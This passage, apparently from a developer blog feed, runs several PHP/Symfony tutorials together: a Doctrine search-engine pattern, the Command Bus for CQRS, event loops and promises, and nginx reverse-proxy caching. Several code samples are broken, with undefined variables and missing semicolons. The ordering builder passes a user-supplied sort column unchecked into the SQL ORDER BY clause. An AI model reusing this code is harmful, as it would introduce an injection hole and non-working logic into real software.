$direction = self::DEFAULT_DIRECTION;
if ('-' === $column[0]) {
$direction = 'DESC';
$column = trim($column, '-');
}
return new self($column, $direction);
}
}
The Filtering value object takes care of all the other parameters:
<?php
namespace AppBundle\Search\Criteria;
class Filtering
{
public $fields;
public function __construct(array $fields)
{
$this->fields = $fields;
}
public static function fromQueryParameters(array $queryParameters) : self
{
$fields = $queryParameters;
unset($fields['page']);
unset($fields['per_page']);
unset($fields['sort']);
return new self($fields);
}
}
With this we have a generic Search Engine. The next step is to provide an implementation.
All implementations of SearchEngine need to be able to handle many types of
parameters (pagination, filtering, etc).
To avoid our Doctrine implementation to become a big ball of mud,
we're going to split the work into Builders, which construct the DQL query using
the QueryBuilder:
<?php
namespace AppBundle\DoctrineSearch;
use AppBundle\Search\Criteria;
use AppBundle\Search\SearchEngine;
use Doctrine\DBAL\Connection;
use Doctrine\DBAL\Query\QueryBuilder;
use Porpaginas\Result;
class DoctrineSearchEngine implements SearchEngine
{
private $connection;
private $builders = [];
public function __construct(Connection $connection)
{
$this->connection = $connection;
}
public function add(Builder $builder)
{
$this->builders[] = $builder;
}
public function match(Criteria $criteria) : Result
{
$queryBuilder = new QueryBuilder($this->connection);
foreach ($this->builders as $builder) {
if (true === $builder->supports($criteria)) {
$builder->build($criteria, $queryBuilder);
}
}
return new DoctrineResult($queryBuilder);
}
}
Here's the Builder interface:
<?php
namespace AppBundle\DoctrineSearch;
use AppBundle\Search\Criteria;
use Doctrine\DBAL\Query\QueryBuilder;
interface Builder
{
public function supports(Criteria $criteria) : bool;
public function build(Criteria $criteria, QueryBuilder $queryBuilder);
}
We're not going to execute the query immediately, we're instead going to return
the QueryBuilder wrapped in a Result implementation: this will allow us to
choose between getting all the profiles or only getting a subset:
<?php
namespace AppBundle\DoctrineSearch;
use Doctrine\DBAL\Query\QueryBuilder;
use Porpaginas\Result;
class DoctrineResult implements Result
{
private $queryBuilder;
public function __construct(QueryBuilder $queryBuilder)
{
$this->queryBuilder = $queryBuilder;
}
public function take($offset, $limit)
{
$queryBuilder = clone $this->queryBuilder;
$queryBuilder->setFirstResult($offset);
$queryBuilder->setMaxResults($limit);
$statement = $queryBuilder->execute();
return new IteratorPage($statement->getIterator(), $offset, $limit, $this->count());
}
public function count()
{
$queryBuilder = clone $this->queryBuilder;
$subSql = $queryBuilder->getSql();
$sql = <<<SQL
SELECT count(*) AS count
FROM (
$subSql
) as sub_query
SQL
;
$result = $queryBuilder->getConnection()->fetchAssoc($sql, $queryBuilder->getParameters());
return $result['count'] ?? 0;
}
public function getIterator()
{
$queryBuilder = clone $this->queryBuilder;
$statement = $queryBuilder->execute();
return $statement->getIterator();
}
}
Finally if a subset is asked, we need to provide our implementation of Page:
<?php
namespace AppBundle\DoctrineSearch;
use Porpaginas\Page;
class IteratorPage implements Page
{
private $iterator;
private $offset;
private $limit;
private $totalCount;
public function __construct(\Iterator $iterator, int $offset, int $limit, int $totalCount)
{
$this->iterator = $iterator;
$this->offset = $offset;
$this->limit = $limit;
$this->totalCount = $totalCount;
}
public function getCurrentOffset()
{
return $this->offset;
}
public function getCurrentPage()
{
if (0 === $this->limit) {
return 1;
}
return floor($this->offset / $this->limit) + 1;
}
public function getCurrentLimit()
{
return $this->limit;
}
public function count()
{
return count($this->iterator);
}
public function totalCount()
{
return $this->totalCount;
}
public function getIterator()
{
return $this->iterator;
}
}
Now that we have a fully functional Search Engine, we need to create Builders
specific for our need. The first one will be about selecting profiles:
<?php
namespace AppBundle\Profile\DoctrineSearch;
use AppBundle\DoctrineSearch\Builder;
use AppBundle\Search\Criteria;
use Doctrine\DBAL\Query\QueryBuilder;
class SelectProfileBuilder implements Builder
{
public function supports(Criteria $criteria) : bool
{
return 'profile' === $criteria->resourceName;
}
public function build(Criteria $criteria, QueryBuilder $queryBuilder)
{
$queryBuilder->select('name');
$queryBuilder->from('profile', 'p');
}
}
We also need to be able to order our results:
<?php
namespace AppBundle\Profile\DoctrineSearch;
use AppBundle\DoctrineSearch\Builder;
use AppBundle\Search\Criteria;
use Doctrine\DBAL\Query\QueryBuilder;
class OrderingBuilder implements Builder
{
public function supports(Criteria $criteria) : bool
{
return true;
}
public function build(Criteria $criteria, QueryBuilder $queryBuilder)
{
$queryBuilder->orderBy(
$criteria->ordering->field,
$criteria->ordering->direction
);
}
}
Finally if a name filter is provided we want to apply it:
<?php
namespace AppBundle\Profile\DoctrineSearch;
use AppBundle\DoctrineSearch\Builder;
use AppBundle\Search\Criteria;
use Doctrine\DBAL\Query\QueryBuilder;
class ProfileNameFilteringBuilder implements Builder
{
public function supports(Criteria $criteria) : bool
{
return 'profile' === $criteria->resourceName && isset($criteria->filtering->fields['name']);
}
public function build(Criteria $criteria, QueryBuilder $queryBuilder)
{
$queryBuilder->where('p.name LIKE :name');
$queryBuilder->setParameter('name', "%{$criteria->filtering->fields['name']}");
}
}
Let's create our controller:
<?php
// File: src/AppBundle/Controller/SearchProfilesController.php
namespace AppBundle\Controller;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Method;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Route;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Symfony\Component\HttpFoundation\JsonResponse;
use Symfony\Component\HttpFoundation\Request;
class SearchProfilesController extends Controller
{
/**
* @Route("/api/v1/profiles")
* @Method({"GET"})
*/
public function searchProfilesAction(Request $request)
{
$criteria = Criteria::fromQueryParameters(
'profile',
$request->query->all()
);
$page = $this->get('app.search_engine')->match($criteria)->take(
$criteria->paginating->offset,
$criteria->paginating->itemsPerPage
);
$totalElements = $page->totalCount();
$totalPages = (int) ceil($totalElements / $criteria->paginating->itemsPerPage);
return new JsonResponse(array(
'items' => iterator_to_array($page->getIterator()),
'page' => array(
'current_page' => $criteria->paginating->currentPage,
'per_page' => $criteria->paginating->itemsPerPage,
'total_elements' => $totalElements,
'total_pages' => $totalPages,
),
), 200);
}
}
And that's it!
Just like using and overusing the "Command Bus" pattern can help us learn more on how to get the "Command" part of CQRS right, using and overusing the "Repository" design pattern in combination with the "Specification" one can help us get the "Query" part right.
Building a private Search Engine component for our project is one way to achieve this.
]]>TL;DR: The Command Bus pattern can help you get the CQRS "Command" part right.
By following the Command / Query Responsibility Segregation (CQRS) principle, we separate "write" logic from "read" logic. This can be applied on many levels, for example on the macro one we can have a single "Publisher" server (write) with many "Subscribers" servers (read), and on a micro level we can use this principle to keep our controllers small.
However, transitioning from a regular mindset to a CQRS one can be difficult.
In this article, we'll explore the "Command Bus" pattern, to help us to get the Command (write) part right.
Let's take the following code for our example:
<?php
// File: src/AppBundle/Controller/ProfileCreationController.php;
namespace AppBundle\Controller;
use AppBundle\Entity\Profile;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Method;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Route;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Symfony\Component\HttpFoundation\JsonResponse;
use Symfony\Component\HttpFoundation\Request;
class ProfileCreationController extends Controller
{
/**
* @Route("/api/v1/profiles")
* @Method({"POST"})
*/
public function createProfileAction(Request $request)
{
$em = $this->get('doctrine.orm.entity_manager');
$name = $request->request->get('name');
if (null === $name) {
return new JsonResponse(array('error' => 'The "name" parameter is missing from the request\'s body'), 422);
}
if (null !== $em->getRepository('AppBundle:Profile')->findOneByName($name)) {
return new JsonResponse(array('error' => 'The name "'.$name.'" is already taken'), 422);
}
$createdProfile = new Profile($name);
$em->persist($createdProfile);
$em->flush();
return new JsonResponse($createdProfile->toArray(), 201);
}
}
It's an endpoint allowing us to create new "profiles". All the logic is done in the Controller:
name parameter from the RequestProfile out of itResponseThe Command Bus pattern relies on 3 types of classes:
Command: encapsulate our input, does simple validation on itCommandHandler: dedicated to a single Command, does the actual logicFinally there's a CommandBus interface allowing us to build Middlewares:
CommandBus that calls the appropriate CommandHandle for the given CommandCommandBus that wraps the above one in a database transactionCommandBus that wraps the above ones to logs all incoming commandsCommandBus that wraps the above ones to check permissionsMiddlewares can do any action we want before and/or after the wrapped CommandBus.
They can be nested in a specific order, allowing us a fine grained control over
how the Command will be handled.
Using our previous example, we're going to create the Command first. It needs
to contain all the input parameters, do a simple validation on it and have an
intention revealing name describing the action we'd like to do:
<?php
// File: src/AppBundle/Profile/CreateNewProfile.php;
namespace AppBundle\Profile;
class CreateNewProfile
{
public $name;
public function __construct($name)
{
if (null === $name) {
throw new \DomainException('Missing required "name" parameter');
}
$this->name = (string) $name;
}
}
Unit tests can be created for Commands, to document their input requirements:
<?php
// File: tests/AppBundle/Profile/CreateNewProfileTest.php;
namespace tests\AppBundle\Profile;
use AppBundle\Profile\CreateNewProfile;
class CreateNewProfileTest extends \PHPUnit_Framework_TestCase
{
const NAME = 'Arthur Dent';
/**
* @test
*/
public function it_has_a_name()
{
$createNewProfile = new CreateNewProfile(self::NAME);
self::assertSame(self::NAME, $createNewProfile->name);
}
/**
* @test
*/
public function it_cannot_miss_a_name()
{
$this->expectException(\DomainException::class);
$createNewProfile = new CreateNewProfile(null);
}
}
The second step is to create the CommandHandler. It needs to do more complex
validation, and the actual logic associated to the Command's intention:
<?php
// File: src/AppBundle/Profile/CreateNewProfileHandler.php;
namespace AppBundle\Profile;
use AppBundle\Entity\Profile;
use Doctrine\ORM\EntityManager;
class CreateNewProfileHandler
{
private $entityManager;
public function __construct(EntityManager $entityManager)
{
$this->entityManager = $entityManager;
}
public function handle(CreateNewProfile $createNewProfile)
{
if (null !== $this->entityManager->getRepository('AppBundle:Profile')->findOneByName($createNewProfile->name)) {
throw new \DomainException("Invalid \"name\" parameter: \"$name\" already exists and duplicates are not allowed");
}
$createdProfile = new Profile($name);
$em->persist($createdProfile);
$em->flush();
return $createdProfile
}
}
Note: a unit test can be created for CommandHandlers, to document use cases and their edge cases (happy and unhappy scenario).
Finally we can use the Command Bus in our controller:
<?php
// File: src/AppBundle/Controller/ProfileCreationController.php;
namespace AppBundle\Controller;
use AppBundle\Profile\CreateNewProfile;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Method;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Route;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Symfony\Component\HttpFoundation\JsonResponse;
use Symfony\Component\HttpFoundation\Request;
class ProfileCreationController extends Controller
{
/**
* @Route("/api/v1/profiles")
* @Method({"POST"})
*/
public function createProfileAction(Request $request)
{
try {
$createdProfile = $this->get('command_bus')->handle(new CreateNewProfile(
$request->request->get('name')
));
} catch (\DomainException $e) {
return new JsonResponse(array('error' => $e->getMessage()), 422);
}
return new JsonResponse($createdProfile->toArray(), 201);
}
}
Note: Exceptions could be handled in an event listener.
Our Command Handler is tightly coupled to Doctrine. We can decouple from libraries by introducing interfaces:
<?php
// File: src/AppBundle/Profile/CreateNewProfileHandler.php;
namespace AppBundle\Profile;
use AppBundle\Profile\Service\CheckProfileNameDuplicates;
use AppBundle\Profile\Service\SaveNewProfile;
class CreateNewProfileHandler
{
private $checkProfileNameDuplicates;
private $saveNewProfile;
public function __construct(
CheckProfileNameDuplicates $checkProfileNameDuplicates,
SaveNewProfile $saveNewProfile
) {
$this->checkProfileNameDuplicates = $checkProfileNameDuplicates;
$this->saveNewProfile = $saveNewProfile;
}
public function handle(CreateNewProfile $createNewProfile)
{
if (true !== $this->checkProfileNameDuplicates->check($createNewProfile->name)) {
throw new \DomainException("Invalid \"name\" parameter: \"$name\" already exists and duplicates are not allowed");
}
$newProfile = new Profile($name); // Entity moved to Profile namespace
$this->saveNewProfile->save($newProfile);
return $newProfile
}
}
In this way, it becomes much easier to write a unit test:
<?php
// File: tests/AppBundle/Profile/CreateNewProfileHandlerTest.php;
namespace tests\AppBundle\Profile;
use AppBundle\Profile\CreateNewProfile;
use AppBundle\Profile\CreateNewProfileHandler;
use AppBundle\Profile\Profile;
use AppBundle\Profile\Service\CheckProfileNameDuplicates;
use AppBundle\Profile\Service\SaveNewProfile;
use Prophecy\Argument;
class CreateNewProfileHandlerTest extends \PHPUnit_Framework_TestCase
{
const NAME = 'Arthur Dent';
private $checkProfileNameDuplicates;
private $saveNewProfile;
private $createNewProfileHandler;
protected function setUp()
{
$this->checkProfileNameDuplicates = $this->prophesize(CheckProfileNameDuplicates::class);
$this->saveNewProfile = $this->prophesize(SaveNewProfile::class);
$this->createNewProfileHandler = new CreateNewProfileHandler(
$this->checkProfileNameDuplicates->reveal(),
$this->saveNewProfile->reveal()
);
}
/**
* @test
*/
public function it_creates_new_profiles()
{
$createNewProfile = new CreateNewProfile(self::NAME);
$this->checkProfileNameDuplicates->check(self::NAME)->willReturn(false);
$this->saveNewProfile->save(Argument::type(Profile::class))->shouldBeCalled();
self::assertType(
Profile::class,
$this->createNewProfileHandler->handle($createNewProfile)
);
}
/**
* @test
*/
public function it_cannot_create_profiles_with_duplicated_name()
{
$createNewProfile = new CreateNewProfile(self::NAME);
$this->checkProfileNameDuplicates->check(self::NAME)->willReturn(true);
$this->saveNewProfile->save(Argument::type(Profile::class))->shouldNotBeCalled();
$this->expectException(\DomainException::class);
$this->createNewProfileHandler->handle($createNewProfile);
}
}
Doctrine implementations are easy to write, for example CheckProfileNameDuplicates:
<?php
namespace AppBundle\Profile\Bridge;
use AppBundle\Profile\Service\CheckProfileNameDuplicates;
use Doctrine\ORM\EntityManager;
class DoctrineCheckProfileNameDuplicates implements CheckProfileNameDuplicates
{
private $entityManager;
public function __construct($entityManager)
{
$this->entityManager = $entityManager;
}
public function check(name)
{
return null === $this->entityManager->getRepository('AppBundle:Profile')->findOneByName($name));
}
}
With the Command Bus pattern, we've reduced our controller to the following responsibilities:
Our Command allows us to make explicit all input parameters and their requirements (thanks to its unit tests, and by doing a simple validation on them).
Our Command Handler allows us to make explicit the actual logic with and to highlight its edge cases in tests.
While refactoring our controller, we took the opportunity to use the Dependency Inversion Principle to decouple our code from thrid party libraries (Doctrine). This was simply done by introducing interfaces, which have the benefit to provide more explicit names.
The best way to learn how to get the Command part in CQRS right is to start using the Command Bus pattern. And to abuse it, by using it everywhere and returning values from Command Handlers.
Once we feel more at ease with the Command Bus pattern, we can start considering alternative uses:
We might realize that ditching the Command Bus and keeping the Command Handler and the Command can still be beneficial. We also might realize that Commands don't solve our "read" logic...
In the next article, we'll experiment with a "Search Engine" pattern to try to get the Query part of CQRS right!
In the meantime, here's some resources related to Command Bus and CQRS:
Then you're in luck! This article aims at answering the "how" question, we'll explore the implementation details of Event Driven Architecture by:
Input / Output (I/O) can refer to Client / Server communication through sockets, for example a HTTP server.
Compared to calculations, I/O is really slow! To understand how this latency can be a performance bottleneck for our applications, we're going to create a simple HTTP server implementation.
In order to do so, we need to make use of some system calls:
From this point clients can ask the permission to connect to the socket, they're
going to be queued up until the given maximum in listen is reached, at which
point errors are going to be thrown everywhere.
To prevent this nightmare, our priority will be to keep this queue empty by calling accept: it's going to unqueue the first client and return a new socket dedicated for it, allowing the "server" socket to accept more clients.
At some point the client will send data in the socket: the HTTP Request. We'll need to call read to retrieve it. We usually need to parse the received string, for example to create a Request value object our HTTP application can understand.
The HTTP application could then return a Response value object that we'll need to convert back to string and send it to the client using write.
Finally, once done we can call close to get rid of the client and start accepting more.
If we put everything in a loop that runs forever we can handle one client at a time. Here's an implementation example (written in pseudo language):
# Socket abstracts `socket`, `bind` and `listen`
http_server = new Socket(host, port, max_connections_to_queue)
while true:
http_connection = http_server.accept()
data = http_connection.read()
request = http_request_parse(data)
response = application(request)
http_connection.write((string) response)
http_connection.close()
In our loop, for each request we call 3 I/O operations:
accept, this call will wait until a new connection is availableread, this call will wait until some data is sent from the clientwrite, this call will wait until the data is sent to the clientThat's a lot of waiting! While we wait for data to be sent, more clients can try to connect, be queued and eventually reach the limit.
In other words, waiting is blocking. If only we could do something else while waiting...
Turns out we can, thanks to polling system calls:
poll with the collection of sockets to watchpoll will wait until it detects activity on those, and returns the ones that are readyAs goes the saying: "Blocking. If it's not solving all your problems, you simply aren't using enough of it".
Note: There's actually many polling system calls:
select, a POSIX standard which takes 3 size fixed bitmap of sockets (read, write, error)poll, another POSIX standard which takes an array of socketsepoll, a stateful Linux specific system call equivalent toselect/pollkqueue, a stateful BSD (that includes Mac OS) specific system call equivalent toselect/pollIOCP, a Windows equivalent toepoll/kqueueFor more information about those, check epoll VS kqueue. In our article
pollwill refer to polling in general, not to a specific implementation.
With this we can change the architecture of our HTTP server:
accept it to get a HTTP client socketread it to get its datawrite itclose the HTTP client socketLet's change our HTTP server to use poll:
http_server = new Socket(host, port, max_connections_to_queue)
connections = new SocketCollection()
connections.append(http_server)
while true:
connections_ready = poll(connections)
for connection in connections_ready:
if http_server == connection:
http_connection = http_server.accept()
connections.append(http_connection)
else:
data = connection.read()
request = http_request_parse(data)
response = application(request)
connection.write((string) response)
connection.close()
connections.remove(connection)
Now we can see the advantage of polling: while waiting for data to be ready on client sockets, we can now accept more connections on the server socket.
Before we continue, let's refactor our code a bit to abstract away the polling logic:
class EventLoop:
function append(connection, callback):
key = (int) connection
self._connections[key] = connection
self._callbacks[key] = callback
function remove(connection):
key = (int) connection
self._connections.pop(key)
self._callbacks.pop(key)
function run():
while true:
connections_ready = poll(self._connections)
for connection in connections_ready:
key = (int) connection
self._callbacks[key](connection, self)
We've named the class EventLoop: every time something happens (an Event) in
the Loop, we call the appropriate callback. Here's our HTTP server with the
EventLoop:
function handle_http_request(http_connection, event_loop):
data = http_connection.read()
request = http_request_parse(data)
response = application(request)
http_connection.write((string) response)
http_connection.close()
event_loop.remove(http_connection)
function handle_http_connection(http_server, event_loop):
http_connection = http_server.accept()
event_loop.append(http_connection, handle_http_request)
http_server = new Socket(host, port, max_connections_to_queue)
event_loop = new EventLoop()
event_loop.append(http_server, handle_http_connection)
event_loop.run()
In the previous implementation, we couldn't make a distinction between client sockets,
with this refactoring we can split our application even more by waiting for
write to be ready (usually poll is able to make a distinction between sockets
ready to be read and sockets ready to be written).
If we don't have any connections, our server will spend most of its time waiting. If only we could do something else while waiting...
Polling system calls usually take a timeout argument: if nothing happens for
the given time it's going to return an empty collection.
By combining it with a OneOffScheduler, we can achieve interesting things.
Here's an implementation:
class OneOffScheduler:
function append(interval, callback, arguments):
self._callbacks[interval][] = callback
self._arguments[interval][] = arguments
function lowest_interval():
return self._callbacks.keys().min()
function tick():
for interval, callbacks in self._callbacks:
if time.now() % interval != 0:
continue
for id, callback in callbacks:
arguments = self._arguments[interval][id]
callback(arguments)
self._callbacks[interval].pop(id)
self._arguments[interval].pop(id)
By "ticking" the clock we check if any registered callback is due.
The lowest_interval method will allow us to set a smart timeout for poll
(e.g. no callback will mean no timeout, a callback with 5s interval will mean 5s timeout, etc).
Here's our EventLoop improved with the OneOffScheduler:
class EventLoop:
function constructor():
self.one_off_scheduler = new OneOffScheduler()
function append(connection, callback):
key = (int) connection
self._connections[key] = connection
self._callbacks[key] = callback
function remove(connection):
key = (int) connection
self._connections.pop(key)
self._callbacks.pop(key)
function run():
while true:
timeout = self.one_off_scheduler.lowest_interval()
connections_ready = poll(self._connections, timeout)
for connection in connections_ready:
key = (int) connection
self._callbacks[key](connection, self)
self.one_off_scheduler.tick()
There are many Scheduler variants possible:
As goes the saying: "Scheduler. If it's not solving all your problems, you simply aren't using enough of it".
We're now able to execute actions even if no actual events happened. All we need
is to register in our EventLoop a callback. And in this callback we can also
register a new callback for our EventLoop. And in this callback...
That's a lot of nested callbacks! It might become hard to understand the "flow of execution" of our application: we're used to read "synchronous" code, not "asynchronous" code.
What if I told you there's a way to make "asynchronous" code look like "synchronous" code? One of the way to do this is to implement promise:
DeferrerDeferrer to create a Promise
Promise, the Deferrer injects into it a resolver callbackon_fulfilled callback in the Promise
Promise calls the injected resolver callback with the given on_fulfilled callback as argumenton_fulfilled callback as an attribute in DeferrerDeferrer that we finally got a value
Deferrer calls the on_fulfilled callback with the value as argumentAs goes the saying: "Callback. If it's not solving all your problems, you simply aren't using enough of it".
Here's an implementation for Deferrer:
class Deferrer:
function promise():
return new Promise(self.resolver)
function resolve(value):
for on_fulfill in self._on_fulfilled:
on_fulfill(value)
function resolver(on_fulfilled):
self._on_fulfilled.append(on_fulfilled)
And for Promise:
class Promise:
function constructor(resolver):
self._resolver = resolver
function then(on_fulfilled):
self._resolver(on_fulfilled)
return new Promise(resolver)
And finally here's a basic usage example:
function hello_world(name):
print 'Hello ' + name + '!'
function welcome_world(name):
print 'Welcome ' + name + '!'
deferrer = new Deferrer()
promise = new deferrer.promise()
promise.then(hello_world).then(welcome_world)
deferrer.resolve('Igor') # prints `Hello Igor!` and `Welcome Igor!`
With this, we contain the complexity to two classes, the rest of the application becomes easier to read: instead of nesting callbacks we can chain them.
Promise and Deferrer both look neat. But what's the link with our scheduled
EventLoop? Turns out the link is Filesystem.
When it comes to Filesystem, we're actually dealing with "U/O" (uh oh) rather than I/O: they've been ranked as the slowest in the latency comparison, but unlike sockets they are blocking.
Thankfully we've got a solution for that: wrapping "blocking" filesystem operations in a class that will simulate a "non-blocking" behavior:
filename), and an additional on_fulfilled callbackDeferrer and returns a PromisePromise callback to add on_fulfilled in the EventLoop, scheduled immediatelyHere's an implementation example of such a wrapper:
class NonBlockingFilesystem:
function constructor(event_loop, filesystem, thread_pool):
self._event_loop = event_loop
self._filesystem = filesystem
self._thread_pool = thread_pool
function open(file, on_opened):
promise = self._thread_pool.map(self._filesystem.open, file)
promise.then(lambda file_descriptor: self._on_file_opened(file_descriptor, on_opened))
function _on_file_opened(file_descriptor, on_opened):
self._event_loop.scheduler.append(1, on_opened, file_descriptor)
function read(file_descriptor, on_read):
promise = self._thread_pool.map(self._filesystem.read, file_descriptor)
promise.then(lambda content: self._on_file_read(content, on_read))
function _on_file_read(content, on_read):
self._event_loop.scheduler.append(1, on_read, content)
By deferring actual filesystem operations to threads, our HTTP server can accept more connections and handle more clients until the call is ready.The thread pool is usually set up with 4 threads.
As goes the saying: "Threading. If it's not solving all your problems, you simply aren't using enough of it... NOT!".
For once, limits are good. If we put too many threads in the pool, we’ll soon reach another limit: the number of filesystem operations allowed by the kernel. If we increase this limit, we’ll soon reach another limit: the number of filesystem operations physically allowed by the hardware (some people tried it, they ended up with burned disks).
Note: Our server and application are still single-threaded. The use of a
ThreadPoolis done in a decoupled way, isolating us from multi-threaded issues.
By "non-blocking I/O", Node.js means that it's using an Event Loop to make use of the network latency to handle multiple clients in parallel.
It's been built with libuv, a low-level C library which embeds in its Event Loop many types of Schedulers and a Thread Pool: it allows it to simulate "non-blocking" behavior by wrapping "blocking" calls (e.g. Filesystem).
Instead of implementing our server in a "sequential" way, like Apache2 does, we can instead implement it with "polling events" in mind: nginx is using this "Event-Driven Architecture" and it allows it to outperform Apache.
Systems built in this way often use Promises, as they help us perceive our "asynchronous" code as "synchronous".
If you're interested to read more on the topic, here are some links:
]]>Note: In the PHP landscape, there are many libraries that allow us to build Event Driven applications:
There's even a PHP Async Interop Group that started researching, to create PHP Standard Recommandation (PSR) for Event Loops, Promise, etc.
TL;DR: Put a reverse proxy (for HTTP cache or load balancing purpose) in front of your application, to increase its performances.
HTTP frameworks, such as Symfony, allow us to build applications that have the potential to achieve Super Speed.
We've already seen a first way to do so (by turning it into a HTTP server), another way would be to put a reverse proxy in front of it.
In this article we'll take a Symfony application and demonstrate how to do so using nginx.
Note: those two ways can be combined, or used independently.
The regular PHP application set up is with nginx and PHP-FPM:
sudo apt-get install nginx php7.0-fpm
PHP-FPM is going to run our PHP application in a shared-nothing architecture. We might want it to be run with the same user as the CLI one to avoid permissions issues:
; /etc/php/7.0/fpm/pool.d/www.conf
; ...
user = foobar
group = foobar
; ...
listen.owner = foobar
listen.group = foobar
; ...
We should probably do the same for nginx:
# /etc/nginx/nginx.conf
user foobar foobar;
# ...
Now we should be ready to set up a virtual host for our application:
# /etc/nginx/sites-available/super-speed-nginx
server {
listen 80;
server_name super-speed-nginx.example.com;
root /home/foobar/super-speed-nginx/web;
location / {
# try to serve file directly, fallback to app.php
try_files $uri /app.php$is_args$args;
}
location ~ ^/app\.php(/|$) {
fastcgi_pass unix:/run/php/php7.0-fpm.sock;
fastcgi_split_path_info ^(.+\.php)(/.*)$;
include fastcgi_params;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
# Prevents URIs that include the front controller. This will 404:
# http://domain.tld/app.php/some-path
# Remove the internal directive to allow URIs like this
internal;
}
# Keep your nginx logs with the symfony ones
error_log /home/foobar/super-speed-nginx/var/logs/nginx_error.log;
access_log /home/foobar/super-speed-nginx/var/logs/nginx_access.log;
}
Note:
fastcgi_pass: the address of the FastCGI server, can be an IP and port (e.g.127.0.0.1:9000or a socket)fastcgi_split_path_info: a regex capturing
- the script name (here
(.+\.php)is a file with the.phpextension), used to set$fastcgi_script_name- the path info (here
(/.*)is a URL like string), used to set$fastcgi_path_infoinclude: includes a file (here/etc/nginx/fastcgi_params)fastcgi_param: set a FastCGI parameter (check defaults values in/etc/nginx/fastcgi_params)
Then we'll make sure it's enabled:
sudo ln -s /etc/nginx/sites-available/super-speed-nginx /etc/nginx/sites-enabled/super-speed-nginx
The only thing missing is a Symfony application! Let's create one using the Standard Edition:
composer create-project symfony/framework-standard-edition super-speed-nginx
cd super-speed-nginx
SYMFONY_ENV=prod SYMFONY_DEBUG=0 composer install -o --no-dev
Finally, we can set up the domain name and restart nginx:
echo '127.0.0.1 super-speed-nginx.example.com' | sudo tee --append /etc/hosts
sudo service nginx restart
Let's check if it works: http://super-speed-nginx.example.com/. If a helpful "Welcome" message is displayed, then everything is fine.
Note: If it doesn't work, check the logs:
- application ones in
/home/foobar/super-speed-nginx/var/logs- nginx ones in
/var/log/nginx- PHP-FPM ones in
/var/log/php7.0-fpm.log
Let's have a quick benchmark:
curl 'http://super-speed-nginx.example.com/'
ab -t 10 -c 10 'http://super-speed-nginx.example.com/'
The result:
Compared to Apache2, nginx performs better at serving static files and when under high traffic (see why).
But our main interest here is in nginx's HTTP caching features.
Applications built with HTTP frameworks (e.g. Symfony) benefit from the HTTP cache specification, all they need is to add some headers to their response:
Cache-Control: max-age=60 will ask caches to keep a copy for 60 seconds after receiving the responseExpires: Fri, 30 Oct 1998 14:19:41 GMT will ask caches to keep a copy of the response until the given dateLast-Modified: Tue, 8 Sep 2015 13:35:23 GMT allows caches to keep a copy and check later in the background if there's a more recent "last modified" dateEtag: a3e455afd allows caches to keep a copy and check later in the background if there's a different "etag" (entity tag)Note: For more information about those headers, check this HTTP cache article.
Since nginx sits between clients (e.g. browsers) and the application, it can act as the cache:
It can even serve stale data when the application is failing (e.g. 500 errors)!
To make use of this feature, we first need to set up nginx:
# /etc/nginx/nginx.conf
# ...
http {
proxy_cache_path /home/foobar/super-speed-nginx/var/nginx levels=1:2 keys_zone=super-speed-nginx:10m max_size=10g inactive=60m use_temp_path=off;
# ...
}
Note:
levels: sets up the directory depth in the cache folder,2is recommended as putting all files in one directory could slow it downkeys_zone: sets up an in memory store for cache keys, to avoid avoid fetching them from the disk (cache name associated to the memory size to use)max-size: sets up the maximum disk size of the cache, when this limit is reached least used copies are removedinactive: sets up the time after which an unused copy can be removeduse_temp_path: enables / disables writing cached copies to a temporary path before they're moved to the permanent one,offis recommended to avoid unecessary filesystem operations
Then we need to edit the virtual host by changing the port from 80 to something
else (e.g. 8042) and add a "cache server" in front of it (the cache server will
listen to port 80, it's the one exposed to clients):
# /etc/nginx/sites-available/super-speed-nginx
server {
listen 80;
server_name super-speed-nginx.example.com;
location / {
proxy_pass http://super-speed-nginx.example.com:8042;
proxy_cache super-speed-nginx;
proxy_cache_key "$scheme://$host$request_uri";
proxy_cache_lock on;
proxy_cache_use_stale updating error timeout http_500 http_502 http_503 http_504;
add_header X-Cache $upstream_cache_status;
}
# Keep your nginx logs with the symfony ones
error_log /home/foobar/super-speed-nginx/var/logs/nginx_cache_error.log;
access_log /home/foobar/super-speed-nginx/var/logs/nginx_cache_access.log;
}
server {
listen 8042;
server_name super-speed-nginx.example.com;
root /home/foobar/super-speed-nginx/web;
location / {
# try to serve file directly, fallback to app.php
try_files $uri /app.php$is_args$args;
}
location ~ ^/app\.php(/|$) {
fastcgi_pass unix:/run/php/php7.0-fpm.sock;
fastcgi_split_path_info ^(.+\.php)(/.*)$;
include fastcgi_params;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
# Prevents URIs that include the front controller. This will 404:
# http://domain.tld/app.php/some-path
# Remove the internal directive to allow URIs like this
internal;
}
# Keep your nginx logs with the symfony ones
error_log /home/foobar/super-speed-nginx/var/logs/nginx_error.log;
access_log /home/foobar/super-speed-nginx/var/logs/nginx_access.log;
}
Note:
proxy_pass: the address of the server we'd like to forward the requests toproxy_cache: sets up the name of the cache, it echoes the one used inkeys_zoneproxy_cache_key: key used to store the copy (the result is converted to md5)proxy_cache_lock: enables / disables concurent cache writing for a given keyproxy_cache_use_stale: sets up usage of a stale copy
updatingwhen the copy is being refreshederror,timeout,http_5**when the application failsadd_header: adds a header to the HTTP Response (e.g. the value of$upstream_cache_statuswhich could beMISS,HIT,EXPIRED, etc)
Now it's the turn of our application. By default Symfony set a
Cache-Control: no-cache header to all responses. Let's change it:
<?php
// src/AppBundle/Controller/DefaultController.php
namespace AppBundle\Controller;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Cache;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Route;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Symfony\Component\HttpFoundation\Request;
class DefaultController extends Controller
{
/**
* @Route("/", name="homepage")
* @Cache(maxage="20", public=true)
*/
public function indexAction(Request $request)
{
// replace this example code with whatever you need
return $this->render('default/index.html.twig', [
'base_dir' => realpath($this->getParameter('kernel.root_dir').'/..'),
]);
}
}
To apply those changes, restart nginx and clear symfony cache:
sudo service nginx restart
